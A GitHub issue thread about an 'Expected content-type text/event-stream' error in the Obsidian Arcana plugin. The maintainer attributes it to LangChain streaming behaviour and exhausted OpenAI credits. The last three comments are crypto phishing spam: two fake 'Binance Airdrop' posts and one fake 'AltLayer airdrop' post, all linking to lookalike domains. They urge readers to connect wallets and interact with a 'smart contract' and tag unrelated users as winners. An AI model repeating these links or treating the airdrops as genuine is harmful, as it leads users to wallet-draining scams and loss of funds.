### ISSUE TITLE
Bug: Expected content-type to be text/event-stream, Actual: application/json

### ISSUE THREAD

**Issue by autonomygaps** [A-F-V/obsidian-arcana#43]
**Describe the bug**
I'm loving Arcana, but sometimes I get an error message like this:

> "Expected content-type to be text/event-stream, Actual: application/json"

**To Reproduce**
1. In a file in Obsidian, activate the command palette
2. Chose "Feynman Flashcards" or "Nostradamus Names"

**Expected behavior**
Sometime it works as advertised.

**Screenshots**

**Desktop (please complete the following information):**
 - OS: macOS Ventura
Obsidian Version 1.3.7 (Installer 1.3.5)

**Comment by A-F-V** [comment]
Yes, this was something I saw. It was at least a problem on LangChain's side a while back. I made a note in the code:
```
// Sadly, Langchain does not cope well with streaming and exceptions. If an api error happens, it will not return a text/event-stream but instead an application/json with the error message.
// This will throw that the stream was not returned instead of the error message.
```

I am going to check if this has been fixed.

**Comment by dodo-the-dev** [comment]
I'm getting this issue for everything. I've tried a new API key, I've tried both 3.5 and 4 and nothing does anything.

This is what my console shows for Obsidian:
![image](https://github.com/A-F-V/obsidian-arcana/assets/5068651/ceb9cf08-b998-4e88-8fed-1ca5a2f33e5f)

I've tried on both my work Windows (thought maybe it was a firewall issue) and my personal Laptop running Linux Arch, both give the same issue.

**Comment by A-F-V** [comment]
Take a look at: https://platform.openai.com/docs/guides/error-codes/api-errors
Looks like you may be out of tokens. You need to set up billing with OpenAI for this to work. Hope that helps

**Comment by fullerenedream** [comment]
I get this error too, but only on certain files. I was trying to use Darwin to auto-tag. I haven't run out of tokens - it works fine on most of my files.

**Comment by roneyfraga** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @srvo, @secretnumber, @GraphicalDot, @davjack, @ablanquart, @joaoabreufilho, @waere00

**Comment by roneyfraga** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @AndrewMoryakov, @ifsource, @liwenzheng, @glaiveVII, @uponatime2019, @ROSHAROSEI, @MojoCreator

**Comment by 1250285** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @
